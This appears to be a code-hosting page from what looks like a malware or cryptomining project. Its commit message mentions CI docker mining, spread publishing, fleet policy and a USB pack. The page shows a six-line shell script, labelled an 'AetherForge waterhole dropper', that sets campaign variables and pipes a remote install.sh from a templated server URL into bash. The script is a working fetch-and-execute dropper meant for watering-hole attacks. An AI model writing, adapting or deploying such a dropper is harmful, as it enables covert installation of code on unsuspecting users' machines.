Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Dashboard ambient layer, comrade presence, Mission Deck and War Room, Emberwake supply chain, spread/docs publishing, fleet policy and modules API, CI docker mining, and refreshed USB pack.
6 lines
206 B
Bash
6 lines
206 B
Bash
#!/bin/sh
|
|
# AetherForge waterhole dropper — curl | bash one-liner target
|
|
export AETHER_CAMPAIGN='{{CAMPAIGN}}'
|
|
export AETHER_UTM='{{CAMPAIGN}}'
|
|
curl -sL '{{SERVER_URL}}/install.sh{{QUERY_SUFFIX}}' | bash
|